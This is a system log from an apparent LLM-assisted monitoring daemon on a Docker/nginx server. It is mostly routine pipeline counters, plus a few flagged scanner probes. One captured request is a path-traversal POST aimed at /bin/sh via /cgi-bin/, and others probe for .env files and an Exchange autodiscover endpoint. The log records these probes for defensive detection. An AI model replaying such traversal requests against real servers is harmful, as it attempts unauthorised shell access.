Mar 20 08:29:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:38.036546 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T08:29:38.036255556Z 181.176.14.90 - - [20/Mar/2026:08:29:38 +0000] "_" "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
Mar 20 08:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:30:01.951537 [observer] Pipeline: processed=3199 pattern_hits=3134 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:30:01.951562 [observer] Patterns: hash=3134 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:30:31.935313 [observer] Pipeline: processed=3203 pattern_hits=3138 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:30:31.935336 [observer] Patterns: hash=3138 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:31:01.948829 [observer] Pipeline: processed=3205 pattern_hits=3140 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:31:01.948972 [observer] Patterns: hash=3140 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:31:31.933964 [observer] Pipeline: processed=3211 pattern_hits=3146 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:31:31.933989 [observer] Patterns: hash=3146 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:32:01.961546 [observer] Pipeline: processed=3213 pattern_hits=3148 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:32:01.961575 [observer] Patterns: hash=3148 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:32:31.953523 [observer] Pipeline: processed=3215 pattern_hits=3150 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:32:31.953557 [observer] Patterns: hash=3150 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:33:01.952482 [observer] Pipeline: processed=3219 pattern_hits=3154 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:33:01.952528 [observer] Patterns: hash=3154 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:33:31.935493 [observer] Pipeline: processed=3221 pattern_hits=3156 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:33:31.935518 [observer] Patterns: hash=3156 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:01.940563 [observer] Pipeline: processed=3225 pattern_hits=3160 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:01.940588 [observer] Patterns: hash=3160 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:31.944410 [observer] Pipeline: processed=3227 pattern_hits=3162 llm_calls=65 llm_errors=0 learned=0
Mar 20 08:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:31.944440 [observer] Patterns: hash=3162 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65
Mar 20 08:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:54.360544 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 08:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:54.360580 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 08:34:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:59.308441 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 08:34:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:59.308476 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 08:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:01.951648 [observer] Pipeline: processed=3234 pattern_hits=3166 llm_calls=68 llm_errors=0 learned=0
Mar 20 08:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:01.951678 [observer] Patterns: hash=3166 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=68
Mar 20 08:35:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:08.171555 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 08:35:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:08.171601 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 08:35:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:23.233848 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 08:35:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:23.233896 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 08:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:31.941940 [observer] Pipeline: processed=3237 pattern_hits=3168 llm_calls=69 llm_errors=0 learned=0
Mar 20 08:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:31.941968 [observer] Patterns: hash=3168 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=69
Mar 20 08:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:01.956815 [observer] Pipeline: processed=3239 pattern_hits=3170 llm_calls=69 llm_errors=0 learned=0
Mar 20 08:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:01.956844 [observer] Patterns: hash=3170 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=69
Mar 20 08:36:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:09.810547 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.90 action=allow pattern_type=prefix
Mar 20 08:36:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:09.810583 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 08:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:31.934138 [observer] Pipeline: processed=3246 pattern_hits=3176 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:31.934181 [observer] Patterns: hash=3176 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:37:01.966773 [observer] Pipeline: processed=3248 pattern_hits=3178 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:37:01.966813 [observer] Patterns: hash=3178 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:37:31.936277 [observer] Pipeline: processed=3252 pattern_hits=3182 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:37:31.936309 [observer] Patterns: hash=3182 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:38:01.955036 [observer] Pipeline: processed=3254 pattern_hits=3184 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:38:01.955081 [observer] Patterns: hash=3184 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:38:31.933932 [observer] Pipeline: processed=3258 pattern_hits=3188 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:38:31.933958 [observer] Patterns: hash=3188 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:39:01.956336 [observer] Pipeline: processed=3260 pattern_hits=3190 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:39:01.956365 [observer] Patterns: hash=3190 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:39:31.952244 [observer] Pipeline: processed=3262 pattern_hits=3192 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:39:31.952266 [observer] Patterns: hash=3192 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:40:01.940315 [observer] Pipeline: processed=3266 pattern_hits=3196 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:40:01.940337 [observer] Patterns: hash=3196 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:40:31.950995 [observer] Pipeline: processed=3268 pattern_hits=3198 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:40:31.951025 [observer] Patterns: hash=3198 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:41:01.938476 [observer] Pipeline: processed=3272 pattern_hits=3202 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:41:01.938507 [observer] Patterns: hash=3202 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:41:31.942934 [observer] Pipeline: processed=3276 pattern_hits=3206 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:41:31.942969 [observer] Patterns: hash=3206 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:42:01.940548 [observer] Pipeline: processed=3280 pattern_hits=3210 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:42:01.940575 [observer] Patterns: hash=3210 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:42:31.940051 [observer] Pipeline: processed=3282 pattern_hits=3212 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:42:31.940092 [observer] Patterns: hash=3212 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:01.980105 [observer] Pipeline: processed=3284 pattern_hits=3214 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:01.980148 [observer] Patterns: hash=3214 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:31.934554 [observer] Pipeline: processed=3288 pattern_hits=3218 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:31.934576 [observer] Patterns: hash=3218 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70
Mar 20 08:43:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:55.027899 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T08:43:55.027483409Z 2026/03/20 08:43:55 [error] 422#422: *747576 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 104.253.36.159, server: _, request: "G...
Mar 20 08:43:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:55.027988 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T08:43:55.027493817Z 104.253.36.159 - - [20/Mar/2026:08:43:55 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li...
Mar 20 08:43:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:55.461563 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T08:43:55.461275298Z 104.253.36.159 - - [20/Mar/2026:08:43:55 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G...
Mar 20 08:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:44:01.942675 [observer] Pipeline: processed=3293 pattern_hits=3223 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:44:01.942703 [observer] Patterns: hash=3223 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:44:31.935859 [observer] Pipeline: processed=3297 pattern_hits=3227 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:44:31.935884 [observer] Patterns: hash=3227 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:45:01.998191 [observer] Pipeline: processed=3299 pattern_hits=3229 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:45:01.998419 [observer] Patterns: hash=3229 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:45:31.933970 [observer] Pipeline: processed=3303 pattern_hits=3233 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:45:31.934005 [observer] Patterns: hash=3233 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:46:01.954060 [observer] Pipeline: processed=3305 pattern_hits=3235 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:46:01.954087 [observer] Patterns: hash=3235 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:46:31.942113 [observer] Pipeline: processed=3309 pattern_hits=3239 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:46:31.942139 [observer] Patterns: hash=3239 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:47:01.966985 [observer] Pipeline: processed=3313 pattern_hits=3243 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:47:01.967021 [observer] Patterns: hash=3243 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:47:31.948934 [observer] Pipeline: processed=3315 pattern_hits=3245 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:47:31.948985 [observer] Patterns: hash=3245 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:48:01.937917 [observer] Pipeline: processed=3319 pattern_hits=3249 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:48:01.937945 [observer] Patterns: hash=3249 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:48:31.938567 [observer] Pipeline: processed=3321 pattern_hits=3251 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:48:31.938594 [observer] Patterns: hash=3251 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:49:01.958938 [observer] Pipeline: processed=3325 pattern_hits=3255 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:49:01.958981 [observer] Patterns: hash=3255 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:49:31.942390 [observer] Pipeline: processed=3327 pattern_hits=3257 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:49:31.942421 [observer] Patterns: hash=3257 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:50:01.954354 [observer] Pipeline: processed=3329 pattern_hits=3259 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:50:01.954383 [observer] Patterns: hash=3259 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:50:31.933980 [observer] Pipeline: processed=3333 pattern_hits=3263 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:50:31.934007 [observer] Patterns: hash=3263 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:51:01.982061 [observer] Pipeline: processed=3335 pattern_hits=3265 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:51:01.982105 [observer] Patterns: hash=3265 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:51:31.935218 [observer] Pipeline: processed=3341 pattern_hits=3271 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:51:31.935248 [observer] Patterns: hash=3271 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:52:01.956295 [observer] Pipeline: processed=3343 pattern_hits=3273 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:52:01.956415 [observer] Patterns: hash=3273 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:52:31.933936 [observer] Pipeline: processed=3347 pattern_hits=3277 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:52:31.933964 [observer] Patterns: hash=3277 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:53:01.944000 [observer] Pipeline: processed=3349 pattern_hits=3279 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:53:01.944027 [observer] Patterns: hash=3279 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:53:31.943227 [observer] Pipeline: processed=3351 pattern_hits=3281 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:53:31.943251 [observer] Patterns: hash=3281 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:54:01.961734 [observer] Pipeline: processed=3355 pattern_hits=3285 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:54:01.961808 [observer] Patterns: hash=3285 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:54:31.943150 [observer] Pipeline: processed=3357 pattern_hits=3287 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:54:31.943194 [observer] Patterns: hash=3287 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:55:01.938035 [observer] Pipeline: processed=3361 pattern_hits=3291 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:55:01.938062 [observer] Patterns: hash=3291 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:55:31.944916 [observer] Pipeline: processed=3363 pattern_hits=3293 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:55:31.944943 [observer] Patterns: hash=3293 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:56:01.980699 [observer] Pipeline: processed=3367 pattern_hits=3297 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:56:01.980735 [observer] Patterns: hash=3297 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:56:31.933784 [observer] Pipeline: processed=3369 pattern_hits=3299 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:56:31.933813 [observer] Patterns: hash=3299 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:57:01.946057 [observer] Pipeline: processed=3373 pattern_hits=3303 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:57:01.946083 [observer] Patterns: hash=3303 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:57:31.937857 [observer] Pipeline: processed=3377 pattern_hits=3307 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:57:31.937881 [observer] Patterns: hash=3307 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:58:01.939673 [observer] Pipeline: processed=3379 pattern_hits=3309 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:58:01.939705 [observer] Patterns: hash=3309 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:58:31.935189 [observer] Pipeline: processed=3383 pattern_hits=3313 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:58:31.935212 [observer] Patterns: hash=3313 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:59:01.945090 [observer] Pipeline: processed=3385 pattern_hits=3315 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:59:01.945118 [observer] Patterns: hash=3315 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 08:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:59:31.935433 [observer] Pipeline: processed=3389 pattern_hits=3319 llm_calls=70 llm_errors=0 learned=0
Mar 20 08:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:59:31.935465 [observer] Patterns: hash=3319 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:00:01.935310 [observer] Pipeline: processed=3391 pattern_hits=3321 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:00:01.935338 [observer] Patterns: hash=3321 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:00:31.951926 [observer] Pipeline: processed=3393 pattern_hits=3323 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:00:31.951955 [observer] Patterns: hash=3323 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:01:01.956690 [observer] Pipeline: processed=3397 pattern_hits=3327 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:01:01.956720 [observer] Patterns: hash=3327 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:01:31.934186 [observer] Pipeline: processed=3400 pattern_hits=3330 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:01:31.934207 [observer] Patterns: hash=3330 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:02:01.961451 [observer] Pipeline: processed=3406 pattern_hits=3336 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:02:01.961481 [observer] Patterns: hash=3336 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:02:31.935136 [observer] Pipeline: processed=3408 pattern_hits=3338 llm_calls=70 llm_errors=0 learned=0
